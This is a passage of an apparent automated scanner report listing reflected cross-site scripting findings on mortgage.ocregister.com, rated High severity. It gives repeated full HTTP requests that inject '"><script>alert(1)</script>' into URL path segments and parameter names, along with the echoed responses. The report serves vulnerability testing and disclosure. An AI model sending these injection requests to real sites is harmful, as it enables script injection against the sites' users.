GET /200783bb0"><script>alert(1)</script>5b51746308e/12/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200783bb0\"><script>alert(1)</script>5b51746308e/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7553a"><script>alert(1)</script>4b6519fec9b was submitted in the REST URL parameter 2. This input was echoed as 7553a\"><script>alert(1)</script>4b6519fec9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/127553a"><script>alert(1)</script>4b6519fec9b/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/127553a\"><script>alert(1)</script>4b6519fec9b/feed/" /> ...[SNIP]...
1.242. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db24"><script>alert(1)</script>33a184a2162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db24\"><script>alert(1)</script>33a184a2162 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/12/?4db24"><script>alert(1)</script>33a184a2162=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:28 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/12/?4db24\"><script>alert(1)</script>33a184a2162=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d30"><script>alert(1)</script>9a1798c9a18 was submitted in the REST URL parameter 1. This input was echoed as 47d30\"><script>alert(1)</script>9a1798c9a18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200847d30"><script>alert(1)</script>9a1798c9a18/01/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200847d30\"><script>alert(1)</script>9a1798c9a18/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23d"><script>alert(1)</script>2d509002565 was submitted in the REST URL parameter 2. This input was echoed as de23d\"><script>alert(1)</script>2d509002565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01de23d"><script>alert(1)</script>2d509002565/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:43 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01de23d\"><script>alert(1)</script>2d509002565/feed/" /> ...[SNIP]...
1.245. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd34"><script>alert(1)</script>6eeaa914028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fd34\"><script>alert(1)</script>6eeaa914028 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01/?1fd34"><script>alert(1)</script>6eeaa914028=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:30 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01/?1fd34\"><script>alert(1)</script>6eeaa914028=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3080f"><script>alert(1)</script>0eba11e28c7 was submitted in the REST URL parameter 1. This input was echoed as 3080f\"><script>alert(1)</script>0eba11e28c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.